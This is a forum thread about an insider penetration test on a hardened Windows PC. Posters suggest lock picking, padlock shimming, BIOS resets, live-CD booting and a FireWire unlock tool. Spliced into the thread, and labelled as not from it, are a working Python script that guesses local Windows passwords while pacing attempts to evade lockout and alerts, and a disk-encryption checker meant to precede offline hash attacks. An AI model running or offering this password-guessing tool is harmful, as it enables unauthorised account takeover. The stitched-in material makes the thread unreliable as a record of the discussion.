
Thread: HELP - Escalate privilege in (well configured) Windows.

  1. #1
    The Dan (Just burned his ISO)
    Join Date
    May 2008
    Posts
    24

    HELP - Escalate privilege in (well configured) Windows.

    Hi,

    I'm pen-testing a different environment; my pen-test is internal (more like an insider).

    All I have is a PC from the company (without any tools, only Windows) connected to the local network.

    My job is to (try to) escalate privilege on this machine and get into the servers on the network.

    Up to here it all seems very easy, but there are some special points:

    - The computer has a clean Windows installation (with a small number of third-party programs: just MS Office, an antivirus, and a program used internally, a kind of ERP).

    - The Windows system is FULLY patched (WSUS).

    - My user privilege is very low; I have basically no permissions on the computer.

    - The computer also has strong Windows policies (I can't change wallpapers, see configuration properties, etc.).

    - The computer has the disk encrypted (a kind of TrueCrypt).

    - The computer has a CD-ROM and USB ports, HOWEVER I'm unable to access them (some program (maybe an endpoint security product?) doesn't allow me to access them).

    - The boot sequence doesn't allow booting via CD or USB.

    - The BIOS boot is protected by passwords.

    - All physical ports on the CPU are locked with a kind of "padlock" for computers.

    - The PC does not have an internet connection.

    - I cannot use my own laptop on the network cable.

    - There is no wireless network.


    NOW..... What I thought of!

    - Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd); however, it needs administrative privilege.

    - By the way, booting BT from CD or USB is not possible.

    - I thought about trying a local brute force against the administrator account; since it's local, maybe it can work. Maybe there is a kind of fast (multi-threaded) tool which allows brute-forcing Windows accounts locally (maybe via the "runas" feature)? Does anyone have any hint for me?

    - I remember that some time ago a lot of people on the internet said that a "FireWire" device could be used to break into any Windows. A kind of "plug and root" via FireWire, where it could copy hash files or unlock the Administrator password. Is anyone aware of (a link to) a detailed description of how to build one?

    I found:

    W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vista.htm

    And even:

    storm.net.nz/static/files/winlockpwn

    The big question is, how do I build one? What do I need? Do I really need an iPod? Can't it be something less expensive? Maybe my own computer? Is there a step-by-step somewhere?

    Note: For all sites with "W W W" you must remove the spaces; I type them this way because my forum account is not allowed to post URLs yet.

    I have no more ideas.

    Do you have any ideas or hints for me? All suggestions are welcome.

    Thanks
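
The "local brute force via runas" idea from the post above, worked through as an added example (this is not code from the thread or from any tool mentioned in it). `runas` itself is a poor fit because it reads the password from the console and cannot be fed from a script; the underlying check is the `LogonUser` API, which any unprivileged user can call against the local SAM. The limiting factor is not threads or CPU but the account lockout policy: each failed attempt is an Event ID 4625 on the host and counts toward the lockout threshold, so the script reads the policy with `net accounts` (no admin rights needed) and stops short of it. Assumptions that are mine, not the poster's: a Windows host with Python 3, the account name `Administrator` and the candidate passwords are placeholders, and the sample `net accounts` output is constructed to match the documented format. The built-in RID-500 Administrator was historically exempt from lockout on older Windows versions, so treat the policy values as the ceiling you must respect, not as a guarantee of how that one account behaves.

```python
"""Added example (not from the thread): test a short candidate list against a
LOCAL Windows account from an unprivileged session without tripping lockout.

Assumptions (mine, not from the original post):
  - Windows host with Python 3; LogonUserW is the real check and is only
    reached on Windows. The `validate` parameter lets the pacing logic be
    exercised anywhere with a stand-in validator.
  - The account name and candidate passwords are placeholders.
  - Lockout policy is read from `net accounts`, which needs no admin rights.
"""
import ctypes
import re
import subprocess
import sys

LOGON32_LOGON_NETWORK = 3        # network logon type: no interactive-logon right required
LOGON32_PROVIDER_DEFAULT = 0
ERROR_ACCOUNT_LOCKED_OUT = 1909  # Win32 error returned once the threshold has been hit

# Constructed sample of `net accounts` output (documented format), used by the
# offline test; a real run calls read_local_policy() instead.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              8
Length of password history maintained:                5
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""


def parse_lockout_policy(text):
    """Return (threshold, window_minutes). threshold is None when lockout is
    disabled ('Never', which is how a threshold of 0 is displayed)."""
    m = re.search(r"Lockout threshold:\s+(\S+)", text)
    w = re.search(r"Lockout observation window \(minutes\):\s+(\d+)", text)
    if not m or not w:
        raise ValueError("unexpected `net accounts` output")
    threshold = None if m.group(1) == "Never" else int(m.group(1))
    if threshold == 0:
        threshold = None
    return threshold, int(w.group(1))


def read_local_policy():
    out = subprocess.run(["net", "accounts"], capture_output=True, text=True, check=True).stdout
    return parse_lockout_policy(out)


def windows_validate(user, password, domain="."):
    """Real check: LogonUserW against the local SAM ('.' means this machine).
    Every failure is logged as Event ID 4625 on the host and counts toward lockout."""
    from ctypes import wintypes  # imported here so the module also loads on non-Windows
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32")
    advapi32.LogonUserW.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, wintypes.LPCWSTR,
                                    wintypes.DWORD, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.LogonUserW.restype = wintypes.BOOL
    token = wintypes.HANDLE()
    if advapi32.LogonUserW(user, domain, password, LOGON32_LOGON_NETWORK,
                           LOGON32_PROVIDER_DEFAULT, ctypes.byref(token)):
        kernel32.CloseHandle(token)
        return True
    if ctypes.get_last_error() == ERROR_ACCOUNT_LOCKED_OUT:
        raise RuntimeError("account is locked out; stop and wait for the lockout duration")
    return False


def try_candidates(user, candidates, threshold, validate, safety_margin=1):
    """Try candidates in order, stopping `safety_margin` attempts short of the
    lockout threshold. Returns (password_or_None, attempts_made, remaining)."""
    budget = len(candidates) if threshold is None else max(threshold - safety_margin, 0)
    attempts = 0
    for i, pw in enumerate(candidates):
        if attempts >= budget:
            return None, attempts, list(candidates[i:])   # resume after the window
        attempts += 1
        if validate(user, pw):
            return pw, attempts, list(candidates[i + 1:])
    return None, attempts, []


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("the live check only runs on Windows")
    threshold, window = read_local_policy()
    found, n, left = try_candidates("Administrator", ["Password1", "Welcome1"],
                                    threshold, windows_validate)
    print(f"tried {n}, found={found!r}, {len(left)} left; "
          f"wait {window} min before the next batch")
```

Run it on the target as the low-privilege user; the remaining list is what you feed back in after the observation window has elapsed. A multi-threaded tool would only reach the threshold faster and lock the account, which on a monitored workstation is exactly the alert you do not want to generate.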

  2. #2
    Senior Member (=Tron=)
    Join Date
    Apr 2008
    Posts
    2,008


    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    -Monkeys are like nature's humans.

  3. #3
    Senior Member Thorn
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509


    Quote Originally Posted by =Tron=:
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.

    Overall, this sounds like a fairly secure PC for the 'average user' in a business environment.


    I'm with Tron on this:

    1) Pick the lock and reset the BIOS.
    2) Set BIOS for USB or CD boot.
    3) Boot BT (or other Live Distro) in appropriate device.
    4) Proceed with attack(s) from there.

    Of course, some of this depends on the scope of the contract. For example, are you allowed to physically open the machine under the contract?

    Out of curiosity, why aren't you allowed to use a laptop on the network?
    Thorn
    Stop the TSA now! Boycott the airlines.
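
Step 4 of the plan above ("proceed with attack(s) from there") normally means the offline route: mount the Windows partition from the live distro and pull the SAM and SYSTEM hives. The original post says the disk is encrypted with something TrueCrypt-like, in which case the partition is unreadable no matter what the BIOS lets you boot, so the first thing worth doing from the live CD is to confirm what the partition actually looks like. The following is an added example, not code from the thread or from any tool in it: it reads the first sector of a volume and reports whether it carries an NTFS or FAT boot sector or is opaque (no signature, near-random bytes, which is what an encrypted volume header looks like). Assumptions that are mine: a Linux live environment with Python 3, device paths like `/dev/sda1` are placeholders, and the sample sectors in the block are constructed, not captured from a real disk.

```python
"""Added example (not from the thread): decide from a live CD whether a raw
volume is a readable filesystem before spending time on offline hive attacks.

A plaintext NTFS or FAT volume carries a recognizable boot sector; a
TrueCrypt-style encrypted volume has no signature and its header is
indistinguishable from random bytes. Assumptions (mine): Linux live
environment, Python 3, device paths are placeholders, sample sectors below
are constructed for illustration.
"""
import math
import random
import sys
from collections import Counter

SECTOR = 512


def shannon_entropy(data):
    """Empirical entropy of `data` in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_boot_sector(sector):
    """Return 'ntfs', 'fat', 'opaque' (no signature, high entropy: encrypted or
    random) or 'unknown' (no signature, low entropy: blank, boot code, ...)."""
    if len(sector) < SECTOR:
        raise ValueError("need at least one 512-byte sector")
    if sector[3:11] == b"NTFS    ":            # NTFS OEM ID at offset 3
        return "ntfs"
    # FAT12/FAT16 carry their type string at 0x36, FAT32 at 0x52.
    if sector[0x36:0x3E] in (b"FAT12   ", b"FAT16   ") or sector[0x52:0x5A] == b"FAT32   ":
        return "fat"
    # 512 uniformly random bytes measure roughly 7.6 bits/byte empirically;
    # filesystem metadata and boot code sit far below that.
    return "opaque" if shannon_entropy(sector) > 7.0 else "unknown"


def classify_device(path):
    """Classify the volume at `path` (a partition device such as /dev/sda1,
    not the whole disk: with system encryption the MBR still holds plaintext
    boot-loader code while the partition behind it is encrypted)."""
    with open(path, "rb") as f:
        return classify_boot_sector(f.read(SECTOR))


# Constructed sample sectors (not real disk images).
NTFS_SECTOR = b"\xEB\x52\x90" + b"NTFS    " + bytes(SECTOR - 11)
FAT32_SECTOR = (b"\xEB\x58\x90" + b"MSWIN4.1" + bytes(0x52 - 11)
                + b"FAT32   " + bytes(SECTOR - 0x5A))
_rng = random.Random(20100101)   # deterministic stand-in for an encrypted header
ENCRYPTED_SECTOR = bytes(_rng.getrandbits(8) for _ in range(SECTOR))
BLANK_SECTOR = bytes(SECTOR)

if __name__ == "__main__":
    for dev in sys.argv[1:]:
        print(dev, classify_device(dev))
```

Usage from the live CD is `python3 volcheck.py /dev/sda1 /dev/sda2`. An `ntfs` result means the usual offline tools (samdump2/bkhive, chntpw) have something to work on; `opaque` on the Windows partition means the encryption is real and the live-CD approach ends at the pre-boot password prompt.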

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,126


    Quote Originally Posted by Thorn:
    Out of curiosity, why aren't you allowed to use a laptop on the network?
    This is the part I don't understand either. These seem like extreme parameters for a business-level pentest. Maybe if we knew the terms of the contract we could help find a loophole.

  5. #5
    Senior Member Talkie Toaster
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131


    Quote Originally Posted by =Tron=:
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I love your method!

    But seriously though, in the UK computer locks and those easily pickable 'circle key' cam locks were never very popular, but I sometimes see them on US stuff on eBay. Maybe a pentester's guide on how to do this safely without breaking anything (client's machine, remember...) would be useful, as most of the ones coming up on Google seem to be for skiddies or for people with stolen laptops!

    The MIT Guide to Lockpicking by a guy called Ted the Tool is a good place to start. I'm sure it will be of interest to many members here. Think of it as 'hacking' a lock!

    TT

  6. #6
    The Dan (Just burned his ISO)
    Join Date
    May 2008
    Posts
    24


    Hi,

    Thank you all for the replies.

    Quote Originally Posted by =Tron=:
    What kind of pad lock are we talking about here? One approach, assuming you are allowed to do this, would be to simply pick the lock, unplug the power supply, open the computer chassis, short the BIOS battery jumper pins or simply remove the CMOS memory to reset the BIOS password and finally reboot computer using a BT3 live-CD or USB.
    I spoke with the contractors and it's allowed. However, I was unable to pick the device. It's a secure padlock more or less like this (I don't know the name of this lock in English):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also, this device has a key, so you can only open it if you are able to unlock (or pick) both the number sequence and the key.

    At the client there is a division that is responsible for physical security, and they control the whole environment via video cameras; if I start to play with the lock for too long, they come and warn me that it's not allowed and that I can face legal action. Obviously, when I explain the case and they speak with the manager of the project, all will be good.

    In the end, I think I will not be opening this padlock.

    Quote Originally Posted by Thorn:
    Out of curiosity, why aren't you allowed to use a laptop on the network?
    Because this is a controlled environment, where there are only some special employees (they access really sensitive data); no one is allowed to enter the environment with laptops, cellphones, PDAs, etc.

    So the goal of the project is to identify what a real employee with bad intentions would be able to do and access....

    I looked at BT3 and it has the FireWire exploit (storm.net.nz/static/files/winlockpwn) to unlock Windows machines; maybe it can be my way to break in.

    Has someone already used it with success? What do I need to create a FireWire exploit device to exploit it?

    Is it possible to do it directly with a FireWire cable connected between 2 computers (victim and attacker)?

    Does someone have a link about how to build one, or a description?

    Any other ideas are welcome...

    Thanks

    cya

  7. #7
    Senior Member Thorn
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509


    Quote Originally Posted by The Dan:
    Hi,

    Thank you all for the replies.

    I spoke with the contractors and it's allowed. However, I was unable to pick the device. It's a secure padlock more or less like this (I don't know the name of this lock in English):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg

    Also, this device has a key, so you can only open it if you are able to unlock (or pick) both the number sequence and the key.

    At the client there is a division that is responsible for physical security, and they control the whole environment via video cameras; if I start to play with the lock for too long, they come and warn me that it's not allowed and that I can face legal action. Obviously, when I explain the case and they speak with the manager of the project, all will be good.

    In the end, I think I will not be opening this padlock.
    Get a beer can! (If that doesn't make any sense, google for "padlock beer can shim" w/o quotes or read this: http://www.i-hacked.com/content/view/189/48/)

  8. #8
    Senior Member streaker69
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535


    This is what I use when I need to escalate physical privileges.

    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  9. #9
    Senior Member (=Tron=)
    Join Date
    Apr 2008
    Posts
    2,008


    Quote Originally Posted by The Dan:
    I spoke with the contractors and it's allowed. However, I was unable to pick the device. It's a secure padlock more or less like this (I don't know the name of this lock in English):

    W W W.nomadtravel.co.uk/images/products/471719ad98c15.jpg
    If the combination padlock actually only has three tumblers, this makes the combination pretty easy to brute-force, i.e. try each of the 1000 possible combinations one by one. Many of these kinds of padlocks are also possible to open by inserting a really slim pick into the space between the actual lock and the metal hook. This does take some practice in order to learn how to utilize the pick, but it is not nearly as hard as one might think.

    Quote Originally Posted by The Dan:
    Also, this device has a key, so you can only open it if you are able to unlock (or pick) both the number sequence and the key.
    What kind of key/lock is this? The reason I ask is that in case the lock is of the pin tumbler type you would most likely be able to pick it with only some moderate training beforehand. If, on the other hand, it is for example Abloy-made, you can pretty much forget about this approach. I know that I am only concentrating on this method at the moment, but the fact is that it does seem like the computer in question is fairly secure software-wise. Good lockpicking skills should never be underestimated, and this sounds like a perfect candidate for showing how an otherwise secure environment can be compromised by bypassing the physical security surrounding it.

  10. #10
    Senior Member streaker69
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535


    Quote Originally Posted by =Tron=:
    If the combination padlock actually only has three tumblers, this makes the combination pretty easy to brute-force, i.e. try each of the 1000 possible combinations one by one. Many of these kinds of padlocks are also possible to open by inserting a really slim pick into the space between the actual lock and the metal hook. This does take some practice in order to learn how to utilize the pick, but it is not nearly as hard as one might think.
    Many of those kinds of locks are easily opened just by applying pressure against the mechanism and turning the tumblers until you feel one catch and then move onto the next one. Most of them have fairly loose tolerances and make it pretty easy to open in just a couple of minutes.
